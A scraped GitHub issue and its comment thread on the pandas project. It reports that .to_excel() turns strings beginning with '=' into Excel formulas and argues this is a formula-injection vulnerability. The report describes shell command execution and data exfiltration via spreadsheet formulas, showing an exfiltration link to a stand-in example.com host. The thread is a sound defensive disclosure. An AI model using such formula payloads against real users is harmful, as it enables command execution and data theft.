-
-
Notifications
You must be signed in to change notification settings - Fork 18.1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Excel formula injection in pandas .to_excel() #29095
Comments
Why do you think that? It's not clear to me one way or another.
The default behavior of both of openpyxl and xlsxwriter is to treat strings starting with |
One reason why I think this should not happen by default is that it's not documented. There is no reason for tabular data cells starting with One other reason why I think this should not happen (or at least be configurable) is that the pandas user might legitimately need to generate cells with text/data starting with One last reason is that this can be a security vulnerability. :)
Yes, this is the default behavior of these librairies. I think this behavior of these libraries is discutable as it can easily open security issues in software using these librairies. It's trying to be helpful but it really is dangerous (*). It would probably be better for them to migrate to a safer default (and warn about the security considerations around this) and add warnings about this in the documenration. However, both libraries provide a way to prevent this from happening which is actually not possible in pandas. (*): This is not unlike PyYaml moving away from unsafe YAML loading by default. Using unsafe YAML loading by default was very convenient but was quite dangerous. |
Have you opened issues with openpyxl and xlwt? |
I did not (yet) because I did not consider it was clearly a vulnerability in openpyxl and xlsxwriter. |
FWIW: I think we also had a Tidelift discussion for this too... |
how is this true at all? we pass thru construction options already; xlxswriter has an option for safe handling and that is our default engine |
It seems xlsxwritier isn't going to change their default: jmcnamara/XlsxWriter#663 At this point, I think the best option is to add an example to the pandas docs about how to properly pass through the option to the engine. Are you interested in working on that @randomstuff? |
For reference, here is an example from the XlsxWriter docs that shows how to pass XlsxWriter options via the Pandas interface. |
Would it make sense to be able to pass |
Wouldn't it better to make formula expansion an optin? It would be a slight breaking change in the API but it would make the API Excel output more consistent with the other ones by default: import pandas as pd
df = pd.DataFrame(["=a"])
df.to_excel("test.xlsx")
df.to_html("test.html") People actually needing formula would only need to add an option to @TomAugspurger, Yes, I might be interested in doing that. If formula expansion (by default) is considered a feature instead of a bug, I think I should document about this behavior in the |
Code Sample
Problem description
When exporting DataFrames to Excel files (.xlsx) , pandas converts strings starting with
=
into Excel formulas. This happens with both .xlsx engines (openpyxl and xlsxwriter).Expected Output
I expect the Excel file to contain a cell with the text:
This a correctness issue: this is probably not what the user expects (especially since this behavior is not documented).
I'd argue this is a security vulnerability as well.
Security considerations
I think this is is a vulnerability in pandas as it could be used by an attacker to inject Excel formulas in the generated .xslx file: this could be used to trigger shell command execution (when opened in
Excel) and data exfiltration (works on LibreOffice as well).
Relationship with CSV injection
This is different from CSV-based injection (but related).
When using the CSV format, cells starting with
=
do not have to be considered as formula: this is the consuming software fault if it is processing the data as formula and we can argue [2] that it is not a security issue in the producing software. Moreover there is not clear way to prevent this from happening from the producing software without altering the original data.However, when exporting to Excel files, each cell can be typed either as string or formula and it is possible to have cells starting with = which are not formulas: it is the producing software responsibility to generate the correct cell.
I would even argue that converting to Excel files instead of CSV files would be a safer route when producing files to be consumed by spreadsheet software because we can prevent this injection from
happening.
Example 1: shell command execution
Here's a minimal example (derived from [4]):
The resulting XSLX file contains:
Notice how the first cell was interpreted as a plain string:
whereas the second was expanded as a Excel formula:
This happens with both XLSX backends (XlsxWriter) and (OpenPyxl). It could be argued that the problem actually lies in the underlying libraries. It is however possible to prevent the formula injections when using these two libraries. I have patches which fix this issue in pandas (see pull request).
In Excel, this formula can execute a local system command. When used with this payload, Excel actually warns before executing the shell command [1]:
The Excel file might actually be coming from a trusted source (a trusted pandas script executed from a trusted environment): the user would then legitimately want to click on "Yes". However, an attacker
could exploit this behavior in pandas to inject a malicious formula in the trusted Excel file.
Example 2: data exfiltration
Another possibility (which can be triggered through LibreOffice) is data exfiltration from the Excel file to a remote server:
Let's take this example (derived from [3]):
It generates a link to:
http://www.example.com/?leak=some%20data
Clicking on this link can be used to exfiltrate data (in this case, the B2 cell from the spreadsheet to a remote server.
References
[1] https://youtu.be/C1o5uVOaufU?t=364
[2] https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection
[3] https://www.notsosecure.com/data-exfiltration-formula-injection/
[4] http://georgemauer.net/2017/10/07/csv-injection.html
Resolution
I think the proper way to handle this is to disable Excel formula injection through .to_excel().
If this behavior is useful for some user, this might be controlled with a parameter of .to_excel(). In this case, the documentation should probably include a warning about the security implications of
enabling this feature. I believe it would be safer to disable this option by default at some point (eg. for pandas 1.0).
Output of
pd.show_versions()
The text was updated successfully, but these errors were encountered: